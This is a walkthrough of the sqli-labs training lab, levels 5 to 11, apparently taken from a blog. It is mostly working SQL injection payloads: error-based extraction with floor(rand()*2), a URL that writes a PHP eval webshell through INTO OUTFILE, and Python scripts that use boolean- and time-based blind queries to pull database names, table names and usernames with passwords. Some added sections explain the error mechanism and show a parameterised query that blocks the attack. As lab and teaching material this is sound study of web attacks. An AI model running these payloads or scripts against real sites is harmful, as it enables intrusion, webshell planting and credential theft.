
sqli-labs(5-11)

2022-02-11 04:31:07  Views: 245  Source: Internet



5&6 Subquery (error-based) injection

MySQL's error messages are displayed on the page.
The trick is the error MySQL raises when floor(rand()*2) is part of a GROUP BY key alongside count(*): the key expression is evaluated once to look the group up in the temporary table and again when the row is inserted, and if the second value collides with a group that already exists the insert fails with ERROR 1062 (Duplicate entry), which echoes the key and with it whatever we concatenated into it. With an unseeded rand() the collision is not guaranteed on every execution; rand(0) yields a fixed sequence, so the error fires reliably as long as the table being grouped has at least three rows (information_schema.tables always does).
Reference: https://www.cnblogs.com/BloodZero/p/4660971.html

payload1: get the database name
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select database()),floor(rand()*2)) as a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key'
payload2: get the table names
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1242 (21000): Subquery returns more than 1 row
The error says the subquery returns more than one row: a scalar subquery inside concat_ws must yield exactly one row, so that is where the statement fails.

payload3: use limit to fetch the table names one at a time
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'users:1' for key 'group_key'
payload4: get the column names (add and table_schema='security' to the inner where clause if another database on the server also has a users table)
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'username:1' for key 'group_key'
payload5: get the row data
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select concat(username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'Dumb:0' for key 'group_key'


Level 6 differs from 5 only in the closing character: a double quote instead of a single quote.
payload:http://sql.test/Less-6/?id=1%22union%20select%20null,count(*),concat_ws(%27:%27,(select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+
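To make the mechanism behind that Duplicate entry error concrete, here is an added Python model of how MySQL's GROUP BY temporary table handles a key that changes between the lookup and the insert. It is not code from the original post: the DuplicateEntry class, the RAND0_BITS sequence (assumed to be the commonly cited start of floor(rand(0)*2)) and the PRNG stand-in for an unseeded rand() are my constructions. It goes a little beyond the page in also estimating how often the unseeded form fails.

```python
import random


class DuplicateEntry(Exception):
    """Stands in for MySQL ERROR 1062 (23000): Duplicate entry '...' for key 'group_key'."""


def group_by_with_volatile_key(rows, key_of):
    """Model of MySQL's GROUP BY over a temporary table when the key is non-deterministic.

    key_of(row) behaves like floor(rand()*2): a fresh value on every call. MySQL evaluates
    the key once to look the group up; if the group is missing it evaluates the key AGAIN to
    build the row it inserts. When the second value already exists, the temp table's unique
    index rejects the insert and the key (carrying our concat_ws() data) is echoed in the error.
    """
    counts = {}
    for row in rows:
        probe = key_of(row)               # first evaluation: lookup
        if probe in counts:
            counts[probe] += 1
            continue
        inserted = key_of(row)            # second evaluation: the value actually stored
        if inserted in counts:
            raise DuplicateEntry(f"Duplicate entry '{inserted}' for key 'group_key'")
        counts[inserted] = 1
    return counts


def leak_via_group_key(secret, bits, row_count):
    """Run the page's query shape  concat_ws(':', secret, floor(rand()*2))  over row_count rows.

    bits supplies the successive floor(rand()*2) values. Returns the error text (what the
    attacker reads) or None when the statement succeeds and leaks nothing.
    """
    stream = iter(bits)
    key_of = lambda _row: f"{secret}:{next(stream)}"
    try:
        group_by_with_volatile_key(range(row_count), key_of)
    except DuplicateEntry as err:
        return str(err)
    return None


# Assumed (commonly cited) start of the floor(rand(0)*2) sequence: 0 1 1 0 1 1 1 0 0 1 1.
# Whatever the exact values, a seeded rand(0) repeats them on every run, so the outcome is fixed.
RAND0_BITS = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1]


def unseeded_error_rate(row_count, trials, seed=1):
    """Fraction of runs that error when the bits come from an unseeded rand() (modelled with
    a seeded PRNG for reproducibility). Once both 'secret:0' and 'secret:1' exist every lookup
    hits, so no further collision is possible; under this model the statement fails on roughly
    half of the runs no matter how many rows feed it, which is why rand(0) is the usual choice."""
    rng = random.Random(seed)
    errors = 0
    for _ in range(trials):
        bits = (rng.randrange(2) for _ in range(2 * row_count))
        if leak_via_group_key("security", bits, row_count) is not None:
            errors += 1
    return errors / trials


if __name__ == "__main__":
    print(leak_via_group_key("security", RAND0_BITS, 3))   # errors on the third row
    print(leak_via_group_key("security", RAND0_BITS, 2))   # None: two rows are not enough
    print(unseeded_error_rate(row_count=50, trials=2000))
```

With the fixed sequence the third row is the one that collides, which is why the payloads group over information_schema.tables rather than over the small users table: any source with three or more rows will do for rand(0), while the unseeded form leaves the outcome to chance.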

7 Dropping a one-line webshell with a file write

First, a complaint about the closing sequence here: I tried for ages and only found out by reading the code that it is two parentheses...

This level uses SQL to perform a file write.
The syntax is select 'xxx' into outfile 'xxx';
It needs the absolute path of the target file, which we can only guess from experience.
Guess from the OS and web server: IIS on Windows Server defaults to c:/inetpub/wwwroot/ (off-topic here, since that is for ASP, but worth knowing).
nginx on Linux is usually /usr/local/nginx/html, /home/wwwroot/default, /usr/share/nginx, /var/www/html, etc.
Apache: /var/www/html, /var/www/html/htdocs.
Guessing the path is not the only hurdle: the database account needs the FILE privilege, and the server's secure_file_priv must be empty or name a directory that contains the target (NULL disables INTO OUTFILE altogether, and packaged installs commonly pin it to a dedicated directory such as /var/lib/mysql-files); the mysqld process also needs write permission on that directory, and INTO OUTFILE refuses to overwrite an existing file. Where any output channel exists, select @@secure_file_priv tells you whether the write can work at all.
payload:http://sql.test/Less-7/?id=0%27))union%20select%20null,null,%27%3C?php%20@eval($_POST[a]);?%3E%27into%20outfile%20%22D:/sqli-labs-master/test.php%22--+



8 Boolean-based blind injection

Compared with level 5, error display is turned off.
Look at the statement: SELECT * FROM users WHERE id='1'and ((select database())='security')-- ' LIMIT 0,1
Nothing is reported; the page prints "You are in..." only when the query returned a row, so the presence or absence of that text is the truth value of whatever condition we append.
That leaves finding conditions the server will evaluate for us:

mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>200);
Empty set (0.00 sec)

mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

Script:

import requests
from tqdm import tqdm
import time

url = "http://sql.test/Less-8/"
TRUE_MARK = "You are in..."   # only shown when the WHERE clause matched a row


def ask(payload, pos, guess):
    """One probe: does ascii(mid(<expr>, pos, 1)) > guess hold on the server?"""
    rsp = requests.get(url + payload.format(pos, guess))
    rsp.encoding = "utf-8"
    return TRUE_MARK in rsp.text


def bp(name, payload, maxlen=200):
    """Recover <expr> character by character with a binary search on its ASCII code.
    payload carries two {} placeholders: the character position, then the value compared
    with '>'. Past the end of the string mid() yields '' and ascii('') is 0, so a failed
    '> 0' probe is the stop condition (the original stop rule, 'two equal characters in a
    row', would cut off values such as Dummy or p@ssword)."""
    for j in tqdm(range(1, maxlen)):
        if not ask(payload, j, 0):
            break
        lo, hi = 0, 127            # invariant: lo < code <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if ask(payload, j, mid):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)
    return name


t1 = time.time()
payload1 = "?id=1%27and%20(ascii(mid(database(),{},1))>{})%23"
databasename = bp("", payload1)
payload2 = ("?id=1%27and%20(ascii(mid((select%20group_concat(table_name)%20from%20"
            "information_schema.tables%20where%20table_schema='" + databasename + "'),{},1))>{})%23")
tablename = bp("", payload2)
t2 = time.time()
print("Total time:")
print(t2 - t1)
print(databasename + "\n" + tablename)

# Originally posted as a second script with its own copy of bp; only the payload differs.
payload3 = ("?id=1%27and%20(ascii(mid((select%20group_concat(username,':',password%20separator%20'<br>')"
            "%20from%20users),{},1))>{})%23")
usernamepassword = bp("", payload3)
print(usernamepassword)
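Because the scripts above need a live lab, here is an added, self-contained Python reproduction of level 8's oracle on an in-memory SQLite table, so the binary-search extractor and its stop condition can be checked offline; it is not code from the original post. The users rows are a constructed subset of the lab data, mid()/ascii()/database() are registered by hand because SQLite lacks them, group_concat uses SQLite's spelling, and the hardened_page function is my addition showing that the same payloads recover nothing once id is bound as a parameter. The time-based levels below only swap the oracle from response text to elapsed time; the search itself is identical.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the first rows of sqli-labs' security.users table.
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]
TRUE_MARK = "You are in..."


def make_db():
    """In-memory SQLite copy of the lab table, with MySQL's mid()/ascii()/database()
    registered so the page's payloads run unchanged (SQLite has none of them)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    conn.create_function("mid", 3, lambda s, pos, n: "" if s is None else s[pos - 1:pos - 1 + n])
    conn.create_function("ascii", 1, lambda s: 0 if not s else ord(s[0]))
    conn.create_function("database", 0, lambda: "security")
    return conn


def vulnerable_page(conn, raw_id):
    """Less-8 as the lab writes it: the id parameter is spliced into the SQL text.
    Errors are swallowed, so the only observable is whether a row came back."""
    sql = f"SELECT * FROM users WHERE id='{raw_id}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return ""
    return TRUE_MARK if row else ""


def hardened_page(conn, raw_id):
    """Same page with a bound parameter: the id is data, never SQL (my addition)."""
    row = conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (raw_id,)).fetchone()
    return TRUE_MARK if row else ""


def extract(page, template, maxlen=64):
    """Boolean-blind extraction. template is the URL-encoded value of the id parameter
    with {pos} and {guess} placeholders (the page's payload shape); page(id) returns the
    response body. A failed '> 0' probe means mid() returned '' (ascii('') = 0), i.e. the
    end of the string, which is the stop rule the page's scripts lack."""
    def oracle(pos, guess):
        return TRUE_MARK in page(unquote_plus(template.format(pos=pos, guess=guess)))

    out = ""
    for pos in range(1, maxlen + 1):
        if not oracle(pos, 0):
            break
        lo, hi = 0, 127                 # invariant: lo < code <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid
            else:
                hi = mid
        out += chr(hi)
    return out


DB_NAME = "1%27%20and%20(ascii(mid(database(),{pos},1))>{guess})--+"
# SQLite spells MySQL's group_concat(username,':',password separator '<br>') as below.
CREDS = ("1%27%20and%20(ascii(mid((select%20group_concat(username||':'||password,'<br>')"
         "%20from%20users),{pos},1))>{guess})--+")


def demo():
    conn = make_db()
    vuln = lambda i: vulnerable_page(conn, i)
    safe = lambda i: hardened_page(conn, i)
    return {
        "database": extract(vuln, DB_NAME),
        "creds": extract(vuln, CREDS),
        "hardened": extract(safe, DB_NAME),   # '' : nothing leaks once id is bound
    }


if __name__ == "__main__":
    print(demo())
```

Run it directly to print the three results. The credentials string contains the doubled letters in Dummy and p@ssword, exactly the kind of input that a "stop when two consecutive characters match" rule would truncate, while the '> 0' probe ends cleanly at the real end of the string.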

9 Time-based blind injection

Looking at the source, the page prints "You are in..." whether or not the query returns anything.

After some work on a payload, this one tested successfully: ?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+

import requests
import time
from tqdm import tqdm

url = "http://sql.test/Less-9/"
SLEEP = 0.3   # seconds; must match the sleep(0.3) in the payloads below


def elapsed(path):
    """Round-trip time of one request; the body is identical either way, so time is the only signal."""
    t1 = time.time()
    rsp = requests.get(url + path)
    rsp.encoding = "utf-8"
    return time.time() - t1


# With `id=0' or if(cond, sleep(0.3), 0)` the id never matches, so the if() is evaluated for
# every row of users and a true condition delays the reply by 0.3 s times the row count.
# The original fixed 5 s threshold only works when that product exceeds 5 s; measuring the
# normal round trip and calling anything SLEEP/2 above it a hit works for any row count.
THRESHOLD = max(elapsed("?id=1") for _ in range(3)) + SLEEP / 2


def ask(payload, pos, guess):
    return elapsed(payload.format(pos, guess)) > THRESHOLD


def bp(name, payload, maxlen=200):
    """Same binary search as level 8; only the oracle changed from text to time.
    A failed '> 0' probe means mid() returned '' (end of string), which is the stop condition."""
    for j in tqdm(range(1, maxlen)):
        if not ask(payload, j, 0):
            break
        lo, hi = 0, 127            # invariant: lo < code <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if ask(payload, j, mid):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)
    return name


# payload1 = "?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+"
# databasename = bp("", payload1)
databasename = "security"        # already recovered with payload1; set directly to save time
payload2 = ("?id=0%27or%20if((ascii(mid((select%20group_concat(table_name)%20from%20"
            "information_schema.tables%20where%20table_schema='" + databasename + "'),{},1))>{}),sleep(0.3),0)--+")
tablename = bp("", payload2)
print(tablename)

# Originally a separate script for the credentials. The payload is long and easy to misread,
# so check the brackets carefully.
payload3 = ("?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')"
            " from users),{},1))>{}),sleep(0.3),0)--+")
usernamepassword = bp("", payload3)
print(usernamepassword)

10

Compared with level 9, the single quote becomes a double quote.

import requests
import time
from tqdm import tqdm

url = "http://sql.test/Less-10/"
SLEEP = 0.3   # seconds; must match the sleep(0.3) in the payloads below


def elapsed(path):
    t1 = time.time()
    rsp = requests.get(url + path)
    rsp.encoding = "utf-8"
    return time.time() - t1


# As in level 9: `id=0" or if(...)` evaluates the if() for every row of users, so a true
# condition costs 0.3 s per row. Measure the normal round trip instead of hard-coding 5 s.
THRESHOLD = max(elapsed("?id=1") for _ in range(3)) + SLEEP / 2


def ask(payload, pos, guess):
    return elapsed(payload.format(pos, guess)) > THRESHOLD


def bp(name, payload, maxlen=200):
    """Binary search on the ASCII code of each character; a failed '> 0' probe marks the end of the string."""
    for j in tqdm(range(1, maxlen)):
        if not ask(payload, j, 0):
            break
        lo, hi = 0, 127            # invariant: lo < code <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if ask(payload, j, mid):
                lo = mid
            else:
                hi = mid
        name += chr(hi)
        print(name)
    return name


# %22 is the double quote that closes the id on this level
payload1 = "?id=0%22or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+"
databasename = bp("", payload1)
databasename = "security"        # the original kept this override of the recovered value as a safety net
payload2 = ("?id=0%22or%20if((ascii(mid((select%20group_concat(table_name)%20from%20"
            "information_schema.tables%20where%20table_schema='" + databasename + "'),{},1))>{}),sleep(0.3),0)--+")
tablename = bp("", payload2)
print(databasename + "\n" + tablename)

# The credentials part was commented out in the original and still pointed at Less-9; it runs
# against Less-10 here, the only change being the double quote after the id.
payload3 = ("?id=0%22or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')"
            " from users),{},1))>{}),sleep(0.3),0)--+")
usernamepassword = bp("", payload3)
print(usernamepassword)

11 Error-based injection

Non-standard solution

Source: https://www.cnblogs.com/yuxiazhengye/p/15881723.html
